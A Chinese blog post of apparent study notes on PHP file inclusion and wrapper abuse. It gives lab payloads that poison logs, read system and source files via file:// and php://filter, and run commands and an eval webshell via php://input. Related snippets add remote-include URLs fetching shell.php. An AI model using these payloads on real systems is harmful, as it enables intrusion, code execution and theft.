文件包含&PHP伪协议

最新推荐文章于 2025-08-16 15:30:00 发布
原创 最新推荐文章于 2025-08-16 15:30:00 发布 · 239 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全漏洞

本文详细介绍了文件包含漏洞的常见利用方式,包括通过URL传参、PHP伪协议、php://filter以及POST请求来执行恶意代码。示例中提到了读取系统文件、执行系统命令等危险操作。同时,还提及了在菜刀工具中的利用技巧以及如何通过数据流文件包含进行攻击。了解这些利用手段有助于加强系统的安全防护。

文件包含漏洞的常见利用

思路:URL传一句话进去(bp抓包),文件包含日志文件执行

http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo();

//要使用php里面的功能就必须传一个参数进去

PHP伪协议

http://127.0.0.1/include.php?file=file://c:/Windows/win.ini

路径必须是绝对路径

php://filter读写文件(查账号密码)
http://127.0.0.1/include.php?file=php://filter/read/convert.base64-encode/resource=include.php

post请求报文

POST /include.php?file=php://input&666=system('dir'); HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

<?php @eval($_REQUEST[666])?>

菜刀里面(index.php会影响菜刀连接)

http://127.0.0.1/include.php?file=php://input
666
<O><?php @eval($_POST[666]);?></O>

在菜刀里POST值使用大O标签

数据流文件包含

GET /include.php?file=data:text/plain:base64,base64编码后的值

读取压缩包内文件,php>5.3

phar://
php文件包含 伪协议
m0_64361111的博客
02-28 1239
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含中的伪协议
My笔记的博客
05-15 1989
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 1393
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
文件包含&php伪协议
Xiiaogu的博客
12-14 1313
将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=file=php://input,下方输入<?没有flag,再输入<?添加完数据后打开终端,查找目录下文件,输入ls,没有flag。返回查找根目录,输入ls /,里边有flag文件。
文件包含PHP伪协议利用方法(file,php://filter,php://input,data://,zip://,phar://)
m0_73771249的博客
09-03 805
1、file使用BP抓包4、data://5、zip://6、phar://
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 6293
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
m0_65336233的博客
10-17 1563
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
42、WEB攻防——通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
qq_55202378的博客
02-05 1504
关于session,只要你与一个网站建立连接,网站某个文件夹下就会产生session文件,关闭浏览器或者过了一段时间,session就会失效,再次建立连接的话就会产生新的session文件。**注意被包含的文件中只要存在php代码,就可以被php解释器解析,不受文件后缀名的影响。默认是开启的,这个东西一旦开启,就是说当文件上传结束后,php将会立即清空对应session文件中的内容。生成一个session文件,session文件的文件内容就是。除此之外,不同的协议,需要开不同的开关。
day42 文件包含&LFI&RFI&伪协议编码算法&代码审计
wanjia01的博客
12-09 509
知识点:1、解释-什么是文件包含2、分类-本地LFI&远程RFI3、利用-配合上传&日志&会话4、利用-伪协议&编码&算法等#核心知识:1、本地包含LFI&远程包含RFI-区别一个只能包含本地,一个可以远程加载具体形成原因由代码和环境配置文件决定2、各类脚本语言包含代码写法-见下文3、各类脚本语言包含伪协议玩法-见图#思路要点:-黑盒发现:主要观察参数传递的数据和文件名是否对应-白盒发现:1、可通过应用功能追踪代码定位审计2、可通过脚本特定函数搜索定位审计。
php伪协议 文件包含(一)
weixin_51692662的博客
10-14 690
文件包含php伪协议
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 8982
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
php伪协议漏洞_php伪协议小结(文件包含
weixin_39579726的博客
12-22 210
继续转发我的csdn.......文章目录闲扯file://php://data://http/httpszip://、compress.bzip2://、compress.zlib://phar://闲扯长期挖不到文件包含漏洞,导致每次挖洞都不太会去注意这一方面,发现刚开始自学的一些知识都忘了。注意(SSRF里面也会用到一些伪协议,注意不要弄混了,要弄清楚协...
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1816
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含PHP伪协议利用方法
A2893992091的博客
09-03 358
path=php://filter/read=convert.base64-encode/resource= ⽂件 .php。⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)使⽤: file:// ⽂件的绝对路径和⽂件名。⽤途:常⽤于读取本地⽂件 / 源码。⽤途:常⽤于读取⽂件 / 源码。
文件包含漏洞之伪协议|必看
qq_45908842的博客
08-16 975
伪协议配合文件包含漏洞,谁用谁爽啊!
文件包含伪协议
qq_60905276的博客
10-11 604
如果url出现有?file=XXX.php等是典型的文件包含 如下 文件包含可以使用PHP伪协议php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 php://fileter 可以读取目标文件的内容,由于读取时,一些代码不能显示,通常使用Base64加密后读取再解密。 文件包含知识点 一、原理: 在开发过程中,当频繁需要跳转网页,或者需要某个函数...
文件包含漏洞 PHP伪协议
小石头的博客
10-21 502
伪协议 include $name . '.inc' include $name require $name allow_url_include fopen($name) file_get_contents($name) file_exists($name) allow_url_fopen php 很多伪协议 所有的伪协议,在使用时,前面都不能有内容。 ...
PHP伪协议-文件包含
shiyingai
12-24 2115
lfi.php <?php include $_GET['file']; ?> php://input   php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 注:当enctype="multipart/form-data",php://input 是无效的。
文件包含支持的伪协议
qq_50673174的博客
05-15 9600
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
php伪协议远程文件包含
最新发布
09-14
PHP伪协议实现远程文件包含是基于文件包含漏洞,攻击者利用特定的PHP伪协议去访问和包含远程服务器上的文件。 ### 原理 文件包含漏洞使得应用程序在包含文件时,未对用户输入的文件路径进行严格过滤和验证,攻击者可以通过构造包含PHP伪协议的URL,绕过正常的文件路径限制,从而实现对远程文件的包含和执行。当应用程序尝试包含这个构造的URL时,就会将远程服务器上的文件内容包含进来并执行其中的代码,达到攻击目的[^1]。 ### 方法 主要是利用支持远程访问的PHP伪协议,如`http://`、`ftp://`等,将包含这些协议的URL作为文件包含函数的参数。在存在文件包含漏洞的页面中,通过修改URL参数,将其指向远程服务器上的恶意文件,实现远程文件包含。 ### 相关示例 1. 若存在如下PHP代码示例: ```php <?php $file = $_GET['file']; include($file); ?> ``` 此代码直接将用户通过`GET`请求传入的`file`参数作为包含文件的路径,未做任何过滤。攻击者可以构造如下URL进行远程文件包含: ``` http://localhost/fileinc/include.php?file=http://远程IP/1.txt http://localhost/fileinc/include.php?file=http://远程IP/alert.html http://localhost/fileinc/include.php?file=http://远程IP/shell.php ``` 在上述URL中,`http://远程IP/`是远程服务器的地址,`1.txt`、`alert.html`、`shell.php`是远程服务器上的文件。当访问这些URL时,本地服务器会尝试包含远程服务器上的对应文件并执行其中的代码。 2. 利用伪协议`file://`也可实现对本地或远程文件的包含,示例URL如下: ``` http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///C:\Windows\system.ini ``` 此URL利用`file://`协议包含了本地`C:\Windows\system.ini`文件。如果存在远程文件,同样可以使用`file://`协议结合远程文件路径来实现包含。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值